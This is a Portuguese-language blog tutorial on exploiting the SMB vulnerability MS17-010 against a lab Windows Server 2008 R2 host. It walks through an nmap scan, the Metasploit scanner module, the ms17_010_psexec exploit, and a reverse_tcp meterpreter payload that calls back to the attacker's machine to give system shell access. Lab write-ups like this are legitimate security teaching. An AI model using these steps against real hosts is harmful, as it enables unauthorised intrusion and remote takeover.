Explorando SMB MS17-010 Na Prática

Explorando SMB MS17-010 Na Prática

abr 12, 2021 Artigos por izaelbm

Fala ai galerinha, hoje vamos explorar uma falha de no protocolo SMB que os ransowares adoram o “MS17-010”.

Neste laboratório iremos explorar um host com o Windows Server 2008 R2.

se tiver interesse em se aprofundar nesta falha veja o boletim da Microsoft(Microsoft Security Bulletin MS17-010 – Critical | Microsoft Docs)

Bom, esta falha esta relacionada ao sistema de compartilhamento de arquivos do windows que utilizam o protocolo “SMBv1/SMBv2”, que geralmente rodam na porta 445, sabendo disso então bora lá.

1 – Vamos realizar um escaneamento no host na porta 445 para descobrir se a porta esta aberta e qual o sistema operacional esta rodando.

$ nmap -v -sSV -O -Pn -p 445 192.168.1.5

Bom com este resultado sabemos que a porta esta aberta e esta rodando um Windows Service 2008 R2, agora vamos utilizar o metasploit para validar se o host é vulnerável.

Iremos utilizar o modulo auxiliar (auxiliary/scanner/smb/smb_ms17_010)

Para este modulo auxiliar iremos definir somente o alvo e faremos da da seguinte forma (set rhosts 192.168.1.5), agora é só executar o módulo com o comando exploit ou run.

\0/ Uhuuull, veja o que temos, a confirmação que o host é vulnerável e ainda temos uma nova informação que o servidor é (x64), com isso agora podemos explora-lo.

O exploit que iremos usar é o (windows/smb/ms17_010_psexec).

Agora vamos definir alguns parâmetros.

1 – Precisamos definir o PAYLOAD, como sabemos que a arquitetura é x64 vamos usar o seguinte payload. (payload windows/x64/meterpreter/reverse_tcp).

2 – Definir o LHOST ou localhost na nossa maquina para quando o exploit for executado realize uma conexão reversa até o nosso host.

3 – Definir o alvo RHOSTS(set rhosts192.168.1.5)

Agora podemos executar o exploit.

Perfeito, agora conseguimos uma sessão do meterpreter.

Digitando shell, obtemos acesso ao system32 do servidor com cmd.

E ai, Gostou?, deixe seu comentário e me siga nas redes sociais.

Nos vemos em breve, Até Mais……

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *